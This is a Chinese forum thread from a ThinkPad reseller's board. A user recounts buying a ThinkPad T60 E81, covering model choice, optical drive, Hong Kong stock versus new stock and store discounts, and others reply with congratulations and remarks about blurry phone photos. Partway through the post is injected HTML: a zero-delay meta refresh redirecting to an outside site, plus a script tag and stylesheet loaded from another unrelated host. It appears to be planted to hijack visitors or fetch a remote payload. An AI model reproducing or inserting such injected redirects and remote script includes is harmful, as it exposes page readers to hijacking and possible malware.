开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 购机手记,上图喽

T60 e81已到手几天了,一直想写个手记啥的,今天就把自己购机的过程简单写写,缅怀一下~~~ ::80::

以前一直用公司配的dell机器,用了3年,零零散散的内外也都快换了个遍.但一直没申请换新的机器,
      自己想买本本的想法还是因为有次这台dell的坏了,当时正赶上周末,几天没机器用,耽误了不少事.::69::
      本来想在申请个本本的,但是实在不想用dell的,就一直没申请,凑合着用吧,还是自己买个本本,也省的每天上下班背来背去的.::68::
      看见周围好几个同事自己买的IBMT42/T43.精致的做工,细腻的线条,晃眼呢,羡慕的不得了,俺的dell完全成了3流货色.
      同事们听说我想买笔记本,都推荐我买IBM的本,买本本当然要找相对价格、服务比较合适的商家,结果就知道xy了,后来就经常在xy的bbs潜水来逛,发现xy人气不错,售后也不错。很厚道的样子,~~决定就是这里了。::85:: ::85::
     选择的过程和大部分人的选择过程是一样的,
      X vs.T
      其实还是很喜欢X的,尤其当时高配出来后,心动的不得了。在X和T之间很犹豫。冲动是小鬼呀,就先放下,过了段时间发现自己还是喜欢T的多些。
      X的虽说很轻薄,但是没有光驱,虽然光驱不是很必要,但是在某些情况下还是要的,要配的话还需要个底座,比较麻烦。底座的接口也多些~~
      从轻巧的角度来讲,这个以后可以给gf买一个,自己么还是先买个T吧

7200 vs.5600
      既然决定买T了,就要考虑是买哪个型号了,这么多型号,还真有点眼花,从我个人来讲,5600的和7200的都在考虑范围内。其他的就直接否掉了。考虑到二级缓存,倾向于7200

硬盘

硬盘当然是大点, 速度也要快些的。

COMBO vs. DVDRW
      本本的光驱上有COMBO和DVDRW的区别,相差300/400/500不等。DVDRW对我来说用处不到。几个月也用不到一、两次,一般的光驱就够我用了,COMBO够用了,偶尔的会刻几张软件备份,给硬盘留出空间。
      如果要刻,其实也是拿公司的本或者别人的本来刻,哈哈~~

港货 vs.新货
      买本本,除了配置和价格,还要关心维修,售后服务,港货虽说价格稍高一些,但是维修还是方便些。
      另外港货还送原装包、带系统。系统么都要重做,可以不考虑。
      而买新货的价格和配置比较实惠些,送的是OEM包。综合考虑,还是要选维修方便些的,我可等不了一个月的返修期。

其他的就不多说了,有空再补充~~

经过长时间的徘徊选择,多方面权衡后,觉的还是D63比较合适, 终于决定出手.. 结果发现断货了,出来个E81, 没说的,就它了.::73:: ::74::

出手前考虑到xy的300优惠,这个对于想买本的人来说还是很实惠的,决定拿下,经过俺辛勤的工作(赚xb也是很累的~~ ),还有论坛里兄弟们的支持(论坛里好多有米的的兄弟~~羡慕,真想去打劫了),终于如愿以偿,以525xb拿到了优惠.    ::81:: 我的小黑开始向我招手呢..  想到过完周末上班,就可以去取机器了(xy离我公司总部很近,当时决定在这买机器也有这个原因),心里就止不住的高兴. ::100::

很不爽的是,正赶上有事,一直没顾上去拿机器.等到了30号,在中行换了rmb,让朋友带钱去xy帮我取机器.选D套餐加1G内存,双肩包.
      中间有个小插曲,朋友说他能在中关村的一家公司那能拿到更低的价格,我想咋不早说了,现在我都决定了,考虑商家的阶段早就过去了,买本除了实惠,还要买个保障。xy的口碑和售后都不错,而且公司离xy很近,要是有事直接过去了,而不用长途跋涉到村里去,就在这里买了。呵呵

等拿到本本后,极度兴奋看了又看呢,爱不释手的打开机器,大致查看了一下,发现电池还有16%,等拿过电源线后,晕了,竟然是没换国标的线,这下可麻烦了~~ 用不了,到超市买了个转换接头,搞定~~
      系统没重新做,直接在硬盘上重新分区,装软件。呵呵,怎是一个爽字了得~~   

这次没买鼠标,在家里暂时还用不到,在公司用就随便找个台式机拔一个ok了。::80::

唯一遗憾的是没贴膜,准备过几天去xy贴个膜~~
  痛苦的是刚过两天,e81就掉下去200,::69:: 不爽啊,上图,手机拍的,不太清楚~~

+400---tszmsid
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

评分

tszmsid + 400

双肩包~~
内胆包~~
小黑~~
键盘~~
屏幕~~
pp
转换接头~~
最后是我的单肩包~~威戈,用来装小黑咋样,

发完了,各位兄弟多来捧捧场老大多给点分吧~~
写得真好!
恭喜啊
上xy这么久还是第一次坐沙发呢,感谢楼主的手记,对我准备购机很有启发和帮助,图片能再清楚一点就好了。
恭喜.
传说中的朦胧美~
恭喜楼主!不错.
虽然不是太清楚,但是图还是蛮大的,恭喜楼主

严重支持!!!

去除朦胧美,搞些高清晰的共享一下。
唉。。图片啊。。
:-),好手记
恭喜
要是拿个相机拍就好了,这些个图片太朦胧了,不过瘾啊
原帖由 arover 于 2007-4-5 14:20 发表
要是拿个相机拍就好了,这些个图片太朦胧了,不过瘾啊

没有DC呀,只好用手机拍了~~
写的不错...照片怎么那么模糊啊